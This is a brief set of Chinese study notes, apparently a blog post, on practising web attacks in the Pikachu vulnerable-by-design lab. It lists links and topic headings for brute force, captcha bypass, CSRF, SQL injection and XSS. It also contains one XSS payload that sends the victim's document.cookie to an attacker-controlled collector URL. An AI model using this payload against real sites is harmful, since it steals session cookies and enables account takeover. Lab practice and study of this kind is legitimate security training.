前情提要
此文章用于解答疑惑与以后提升能力用,非全程操作教程。
正文
教学视频:
pikachu靶场
地址:https://github.com/zhuifengshaonianhanlu/pikachu
burp suite的四种 attack type(攻击类型)
地址:https://blog.csdn.net/qq_38632151/article/details/102600053
常用端口号大全
地址:https://blog.csdn.net/qq_43236906/article/details/109249050
关闭端口占用进程
地址:https://blog.csdn.net/qq_41153943/article/details/104734054
pikachu数据连接失败,请仔细检查inc/config.inc.php的配置解决方法。
地址:https://blog.csdn.net/m0_66588420/article/details/139119430
暴力破解
基于前端的验证码绕过(On client)
基于服务器的验证码绕过(On server)
(未)Pikachu-XSS漏洞之cookie值获取、钓鱼结果和键盘记录实战记录
3-7、8、5、6
xss后台根据小破站up视频创建就好了,需要改些文件,相信聪明的你可以改好哈。
精简版教程:https://www.cnblogs.com/li2019/p/12650512.html
丰富版教程:使用pikachu管理工具下的XSS后台进行实战_pikachu xss后台
XSS(get型)之cookie值获取:
攻击代码:
<script>document.location = ‘http://xxx.xxx.xxx.xxx/Pikachu-master/pkxss/xcookie/cookie.php?cookie=’ + document.cookie;</script>
注意:http://xx.xx.xx.xx/Pikachu-master/ (xx.xx.xx.xx为自己的IP地址, pikachu-master是路径名, 我的是http://192.168.xx.xx/Pikachu/
CSRF(跨站请求伪造漏洞)
CSRF Token
SQL-Inject(SQL注入漏洞)
SQL-Inject漏洞原理概述
sqlmap: